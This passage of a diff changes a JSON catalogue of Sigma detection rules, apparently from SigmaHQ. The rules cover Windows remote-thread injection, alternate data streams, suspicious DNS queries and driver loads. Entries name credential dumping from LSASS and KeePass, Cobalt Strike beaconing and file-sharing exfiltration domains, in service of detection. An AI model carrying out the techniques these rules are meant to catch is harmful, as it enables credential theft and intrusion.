"2e4e488a-6164-4811-9ea1-f960c7359c40", - "value": "CACTUSTORCH Remote Thread Creation" + "uuid": "fb656378-f909-47c1-8747-278bf09f4f4f", + "value": "Potential Credential Dumping Attempt Via PowerShell Remote Thread" }, { - "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", + "description": "Detects a remote thread creation in suspicious target images", "meta": { - "author": "Olaf Hartong, Florian Roth, Aleksey Potapov, oscd.community", - "creation_date": "2018/11/30", + "author": "Florian Roth", + "creation_date": "2022/03/16", "falsepositive": [ "Unknown" ], - "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml", + "filename": "create_remote_thread_win_susp_targets.yml", "level": "high", "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ - "https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f", - "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_cobaltstrike_process_injection.yml" + "https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_targets.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1055.001" + "attack.privilege_escalation", + "attack.t1055.003" ] }, - "uuid": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", - "value": "CobaltStrike Process Injection" - }, - { - "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/08/11", - "falsepositive": [ - "Unknown" - ], - "filename": "create_remote_thread_win_loadlibrary.yml", - "level": "high", - "logsource.category": "create_remote_thread", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-180719170510.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_loadlibrary.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1055.001" - ] - }, - "uuid": "052ec6f6-1adc-41e6-907a-f1c813478bee", - "value": "CreateRemoteThread API and LoadLibrary" + "uuid": "a1a144b7-5c9b-4853-a559-2172be8d4a03", + "value": "Remote Thread Creation in Suspicious Targets" }, { "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", @@ -20589,9 +22581,9 @@ "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ - "https://www.cisa.gov/uscert/ncas/alerts/aa20-259a", "https://github.com/denandz/KeeFarce", "https://github.com/GhostPack/KeeThief", + "https://www.cisa.gov/uscert/ncas/alerts/aa20-259a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_password_dumper_keepass.yml" ], "tags": [ @@ -20603,79 +22595,33 @@ "value": "KeePass Password Dumping" }, { - "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", + "description": "Detects remote thread creation from CACTUSTORCH as described in references.", "meta": { - "author": "Thomas Patzke", - "creation_date": "2017/02/19", - "falsepositive": [ - "Antivirus products" - ], - "filename": "create_remote_thread_win_password_dumper_lsass.yml", - "level": "high", - "logsource.category": "create_remote_thread", - "logsource.product": "windows", - "refs": [ - "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WCE.htm", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_password_dumper_lsass.yml" - ], - "tags": [ - "attack.credential_access", - "attack.s0005", - "attack.t1003.001" - ] - }, - "uuid": "f239b326-2f41-4d6b-9dfa-c846a60ef505", - "value": "Password Dumper Remote Thread in LSASS" - }, - { - "description": "Detects the creation of a remote thread from a Powershell process to another process", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/06", + "author": "@SBousseaden (detection), Thomas Patzke (rule)", + "creation_date": "2019/02/01", "falsepositive": [ "Unknown" ], - "filename": "create_remote_thread_win_powershell_code_injection.yml", + "filename": "create_remote_thread_win_cactustorch.yml", "level": "high", "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_powershell_code_injection.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50", - "value": "Accessing WinAPI in PowerShell. Code Injection" - }, - { - "description": "Detects PowerShell remote thread creation in Rundll32.exe", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/06/25", - "falsepositive": [ - "Unknown" - ], - "filename": "create_remote_thread_win_susp_powershell_rundll32.yml", - "level": "high", - "logsource.category": "create_remote_thread", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_powershell_rundll32.yml" + "https://github.com/mdsecactivebreach/CACTUSTORCH", + "https://twitter.com/SBousseaden/status/1090588499517079552", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_cactustorch.yml" ], "tags": [ "attack.defense_evasion", + "attack.t1055.012", "attack.execution", - "attack.t1218.011", - "attack.t1059.001" + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218.005" ] }, - "uuid": "99b97608-3e21-4bfe-8217-2a127c396a0e", - "value": "PowerShell Rundll32 Remote Thread Creation" + "uuid": "2e4e488a-6164-4811-9ea1-f960c7359c40", + "value": "CACTUSTORCH Remote Thread Creation" }, { "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like word.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", @@ -20724,31 +22670,6 @@ "uuid": "f016c716-754a-467f-a39e-63c06f773987", "value": "Suspicious Remote Thread Target" }, - { - "description": "Detects a remote thread creation in suspicious target images", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/03/16", - "falsepositive": [ - "Unknown" - ], - "filename": "create_remote_thread_win_susp_targets.yml", - "level": "high", - "logsource.category": "create_remote_thread", - "logsource.product": "windows", - "refs": [ - "https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_targets.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.003" - ] - }, - "uuid": "a1a144b7-5c9b-4853-a559-2172be8d4a03", - "value": "Remote Thread Creation in Suspicious Targets" - }, { "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", "meta": { @@ -20774,607 +22695,79 @@ "value": "Remote Thread Creation Ttdinject.exe Proxy" }, { - "description": "Detects the creation of an ADS data stream that contains an executable (non-empty imphash)", + "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", "meta": { - "author": "Florian Roth, @0xrawsec", - "creation_date": "2018/06/03", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/11", "falsepositive": [ "Unknown" ], - "filename": "create_stream_hash_ads_executable.yml", - "level": "medium", - "logsource.category": "create_stream_hash", + "filename": "create_remote_thread_win_loadlibrary.yml", + "level": "high", + "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ - "https://twitter.com/0xrawsec/status/1002478725605273600?s=21", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_ads_executable.yml" + "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-180719170510.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_loadlibrary.yml" ], "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.t1055.001" ] }, - "uuid": "b69888d4-380c-45ce-9cf9-d9ce46e67821", - "value": "Executable in ADS" + "uuid": "052ec6f6-1adc-41e6-907a-f1c813478bee", + "value": "CreateRemoteThread API and LoadLibrary" }, { - "description": "Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers", - "meta": { - "author": "frack113", - "creation_date": "2022/10/22", - "falsepositive": [ - "Other legitimate browsers not currently included in the filter (please add them)", - "Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)" - ], - "filename": "create_stream_hash_creation_internet_file.yml", - "level": "medium", - "logsource.category": "create_stream_hash", - "logsource.product": "windows", - "refs": [ - "https://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_creation_internet_file.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "573df571-a223-43bc-846e-3f98da481eca", - "value": "Creation Of a Suspicious ADS File Outside a Browser Download" - }, - { - "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", + "description": "Detects PowerShell remote thread creation in Rundll32.exe", "meta": { "author": "Florian Roth", - "creation_date": "2022/08/24", + "creation_date": "2018/06/25", "falsepositive": [ "Unknown" ], - "filename": "create_stream_hash_hacktool_download.yml", + "filename": "create_remote_thread_win_susp_powershell_rundll32.yml", "level": "high", - "logsource.category": "create_stream_hash", + "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml" + "https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_powershell_rundll32.yml" ], "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" - ] - }, - "uuid": "19b041f6-e583-40dc-b842-d6fa8011493f", - "value": "Hacktool Download" - }, - { - "description": "Exports the target Registry key and hides it in the specified alternate data stream.", - "meta": { - "author": "Oddvar Moe, Sander Wiebing, oscd.community", - "creation_date": "2020/10/07", - "falsepositive": [ - "Unknown" - ], - "filename": "create_stream_hash_regedit_export_to_ads.yml", - "level": "high", - "logsource.category": "create_stream_hash", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ] - }, - "uuid": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", - "value": "Exports Registry Key To an Alternate Data Stream" - }, - { - "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/08/24", - "falsepositive": [ - "Unknown" - ], - "filename": "create_stream_hash_susp_domain_ext_combo.yml", - "level": "high", - "logsource.category": "create_stream_hash", - "logsource.product": "windows", - "refs": [ - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" - ] - }, - "uuid": "52182dfb-afb7-41db-b4bc-5336cb29b464", - "value": "Suspicious File Download from File Sharing Domain" - }, - { - "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/08/24", - "falsepositive": [ - "Unknown" - ], - "filename": "create_stream_hash_susp_domain_ext_combo_med.yml", - "level": "medium", - "logsource.category": "create_stream_hash", - "logsource.product": "windows", - "refs": [ - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo_med.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" - ] - }, - "uuid": "ae02ed70-11aa-4a22-b397-c0d0e8f6ea99", - "value": "Unusual File Download from File Sharing Domain" - }, - { - "description": "Detects the download of suspicious file type from URLs with IP", - "meta": { - "author": "Nasreddine Bencherchali, Florian Roth", - "creation_date": "2022/09/07", - "falsepositive": [ - "Unknown" - ], - "filename": "create_stream_hash_susp_ip_domains.yml", - "level": "high", - "logsource.category": "create_stream_hash", - "logsource.product": "windows", - "refs": [ - "https://github.com/trustedsec/SysmonCommunityGuide/blob/adcdfee20999f422b974c8d4149bf4c361237db7/chapters/file-stream-creation-hash.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ] - }, - "uuid": "025bd229-fd1f-4fdb-97ab-20006e1a5368", - "value": "Unusual File Download from Direct IP Address" - }, - { - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "meta": { - "author": "frack113", - "creation_date": "2022/07/11", - "falsepositive": [ - "FP may be caused in legitimate usage of the softwares mentioned above" - ], - "filename": "dns_query_remote_access_software_domains.yml", - "level": "medium", - "logsource.category": "dns_query", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution", - "https://redcanary.com/blog/misbehaving-rats/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_remote_access_software_domains.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "4d07b1f4-cb00-4470-b9f8-b0191d48ff52", - "value": "Query To Remote Access Software Domain" - }, - { - "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", - "meta": { - "author": "pH-T", - "creation_date": "2022/07/15", - "falsepositive": [ - "Legitimate access to anonfiles.com" - ], - "filename": "dns_query_win_anonymfiles_com.yml", - "level": "high", - "logsource.category": "dns_query", - "logsource.product": "windows", - "refs": [ - "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_anonymfiles_com.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567.002" - ] - }, - "uuid": "065cceea-77ec-4030-9052-fc0affea7110", - "value": "DNS Query for Anonfiles.com Domain" - }, - { - "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2021/04/12", - "falsepositive": [ - "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" - ], - "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml", - "level": "high", - "logsource.category": "dns_query", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_hybridconnectionmgr_servicebus.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1554" - ] - }, - "uuid": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", - "value": "DNS HybridConnectionManager Service Bus" - }, - { - "description": "AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL", - "meta": { - "author": "frack113", - "creation_date": "2021/11/24", - "falsepositive": [ - "Unknown" - ], - "filename": "dns_query_win_lobas_appinstaller.yml", - "level": "medium", - "logsource.category": "dns_query", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/notwhickey/status/1333900137232523264", - "https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_lobas_appinstaller.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "7cff77e1-9663-46a3-8260-17f2e1aa9d0a", - "value": "AppInstaller Attempts From URL by DNS" - }, - { - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/11/09", - "falsepositive": [ - "Unknown" - ], - "filename": "dns_query_win_mal_cobaltstrike.yml", - "level": "critical", - "logsource.category": "dns_query", - "logsource.product": "windows", - "refs": [ - "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", - "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_mal_cobaltstrike.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.004" - ] - }, - "uuid": "f356a9c4-effd-4608-bbf8-408afd5cd006", - "value": "Suspicious Cobalt Strike DNS Beaconing" - }, - { - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "meta": { - "author": "Aaron Greetham (@beardofbinary) - NCC Group", - "creation_date": "2021/05/26", - "falsepositive": [ - "Legitimate Mega upload" - ], - "filename": "dns_query_win_mega_nz.yml", - "level": "high", - "logsource.category": "dns_query", - "logsource.product": "windows", - "refs": [ - "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_mega_nz.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567.002" - ] - }, - "uuid": "613c03ba-0779-4a53-8a1f-47f914a4ded3", - "value": "DNS Query for MEGA.io Upload Domain" - }, - { - "description": "Detects several different DNS-answers by one domain with IPs from internal and external networks. Normally, DNS-answer contain TTL >100. (DNS-record will saved in host cache for a while TTL).", - "meta": { - "author": "Ilyas Ochkov, oscd.community", - "creation_date": "2019/10/25", - "falsepositive": "No established falsepositives", - "filename": "dns_query_win_possible_dns_rebinding.yml", - "level": "medium", - "logsource.category": "dns_query", - "logsource.product": "windows", - "refs": [ - "https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_possible_dns_rebinding.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1189" - ] - }, - "uuid": "eb07e747-2552-44cd-af36-b659ae0958e4", - "value": "Possible DNS Rebinding" - }, - { - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "meta": { - "author": "Dmitriy Lifanov, oscd.community", - "creation_date": "2019/10/25", - "falsepositive": [ - "Unknown" - ], - "filename": "dns_query_win_regsvr32_network_activity.yml", - "level": "high", - "logsource.category": "dns_query", - "logsource.product": "windows", - "refs": [ - "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/", - "https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml" - ], - "tags": [ "attack.execution", - "attack.t1559.001", - "attack.defense_evasion", - "attack.t1218.010" + "attack.t1218.011", + "attack.t1059.001" ] }, - "uuid": "36e037c4-c228-4866-b6a3-48eb292b9955", - "value": "Regsvr32 Network Activity - DNS" + "uuid": "99b97608-3e21-4bfe-8217-2a127c396a0e", + "value": "PowerShell Rundll32 Remote Thread Creation" }, { - "description": "Detects DNS queries for ip lookup services such as api.ipify.org not originating from a non browser process.", + "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.", "meta": { - "author": "Brandon George (blog post), Thomas Patzke (rule)", - "creation_date": "2021/07/08", + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/16", "falsepositive": [ - "Legitimate usage of ip lookup services such as ipify API" + "Legitimate BIOS driver updates (should be rare)" ], - "filename": "dns_query_win_susp_ipify.yml", - "level": "medium", - "logsource.category": "dns_query", - "logsource.product": "windows", - "refs": [ - "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon", - "https://twitter.com/neonprimetime/status/1436376497980428318", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_ipify.yml" - ], - "tags": [ - "attack.reconnaissance", - "attack.t1590" - ] - }, - "uuid": "ec82e2a5-81ea-4211-a1f8-37a0286df2c2", - "value": "Suspicious DNS Query for IP Lookup Service APIs" - }, - { - "description": "Detect suspicious LDAP request from non-Windows application", - "meta": { - "author": "frack113", - "creation_date": "2022/08/20", - "falsepositive": [ - "Programs that also lookup the observed domain" - ], - "filename": "dns_query_win_susp_ldap.yml", - "level": "medium", - "logsource.category": "dns_query", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_ldap.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1482" - ] - }, - "uuid": "a21bcd7e-38ec-49ad-b69a-9ea17e69509e", - "value": "Suspicious LDAP Domain Access" - }, - { - "description": "Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/01/30", - "falsepositive": [ - "Unknown binary names of TeamViewer", - "Other programs that also lookup the observed domain" - ], - "filename": "dns_query_win_susp_teamviewer.yml", - "level": "medium", - "logsource.category": "dns_query", - "logsource.product": "windows", - "refs": [ - "https://www.teamviewer.com/en-us/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_teamviewer.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "778ba9a8-45e4-4b80-8e3e-34a419f0b85e", - "value": "Suspicious TeamViewer Domain Access" - }, - { - "description": "Detects DNS resolution of an .onion address related to Tor routing networks", - "meta": { - "author": "frack113", - "creation_date": "2022/02/20", - "falsepositive": [ - "Unknown" - ], - "filename": "dns_query_win_tor_onion.yml", + "filename": "driver_load_win_mal_poortry_driver.yml", "level": "high", - "logsource.category": "dns_query", - "logsource.product": "windows", - "refs": [ - "https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_tor_onion.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1090.003" - ] - }, - "uuid": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", - "value": "Query Tor Onion Address" - }, - { - "description": "Detects DNS queries for subdomains used for upload to ufile.io", - "meta": { - "author": "yatinwad and TheDFIRReport", - "creation_date": "2022/06/23", - "falsepositive": [ - "Legitimate Ufile upload" - ], - "filename": "dns_query_win_ufile_io.yml", - "level": "high", - "logsource.category": "dns_query", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2021/12/13/diavol-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_ufile_io.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567.002" - ] - }, - "uuid": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", - "value": "DNS Query for Ufile.io Upload Domain" - }, - { - "description": "Detects well-known credential dumping tools execution via service execution events", - "meta": { - "author": "Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", - "creation_date": "2017/03/05", - "falsepositive": [ - "Legitimate Administrator using credential dumping tool for password recovery" - ], - "filename": "driver_load_mal_creddumper.yml", - "level": "critical", "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_mal_creddumper.yml" - ], - "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" - ] - }, - "uuid": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", - "value": "Credential Dumping Tools Service Execution" - }, - { - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "meta": { - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", - "creation_date": "2019/10/26", - "falsepositive": [ - "Highly unlikely" - ], - "filename": "driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml", - "level": "critical", - "logsource.category": "driver_load", - "logsource.product": "windows", - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", - "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" + "https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_mal_poortry_driver.yml" ], "tags": [ "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.t1543", + "attack.t1068" ] }, - "uuid": "d585ab5a-6a69-49a8-96e8-4a726a54de46", - "value": "Meterpreter or Cobalt Strike Getsystem Service Installation" - }, - { - "description": "Detects powershell script installed as a Service", - "meta": { - "author": "oscd.community, Natalia Shornikova", - "creation_date": "2020/10/06", - "falsepositive": [ - "Unknown" - ], - "filename": "driver_load_powershell_script_installed_as_service.yml", - "level": "high", - "logsource.category": "driver_load", - "logsource.product": "windows", - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_powershell_script_installed_as_service.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002" - ] - }, - "uuid": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", - "value": "PowerShell Scripts Run by a Services" - }, - { - "description": "Detects the load of drivers used by Process Hacker and System Informer", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/11/16", - "falsepositive": [ - "Legitimate user of process hacker or system informer by low level developers or system administrators" - ], - "filename": "driver_load_process_hacker.yml", - "level": "medium", - "logsource.category": "driver_load", - "logsource.product": "windows", - "refs": [ - "https://processhacker.sourceforge.io/", - "https://systeminformer.sourceforge.io/", - "https://github.com/winsiderss/systeminformer", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_process_hacker.yml" - ], - "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" - ] - }, - "uuid": "67add051-9ee7-4ad3-93ba-42935615ae8d", - "value": "Process Hacker and System Informer Driver Load" + "uuid": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", + "value": "Usage Of Malicious POORTRY Signed Driver" }, { "description": "Detects a driver load from a temporary directory", @@ -21384,12 +22777,12 @@ "falsepositive": [ "There is a relevant set of false positives depending on applications in the environment" ], - "filename": "driver_load_susp_temp_use.yml", + "filename": "driver_load_win_susp_temp_use.yml", "level": "high", "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_susp_temp_use.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_susp_temp_use.yml" ], "tags": [ "attack.persistence", @@ -21408,13 +22801,13 @@ "falsepositive": [ "Unknown" ], - "filename": "driver_load_vuln_avast_anti_rootkit_driver.yml", + "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml", "level": "high", "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ "https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_avast_anti_rootkit_driver.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_avast_anti_rootkit_driver.yml" ], "tags": [ "attack.privilege_escalation", @@ -21424,106 +22817,6 @@ "uuid": "7c676970-af4f-43c8-80af-ec9b49952852", "value": "Vulnerable AVAST Anti Rootkit Driver Load" }, - { - "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/05/05", - "falsepositive": [ - "Legitimate BIOS driver updates (should be rare)" - ], - "filename": "driver_load_vuln_dell_driver.yml", - "level": "high", - "logsource.category": "driver_load", - "logsource.product": 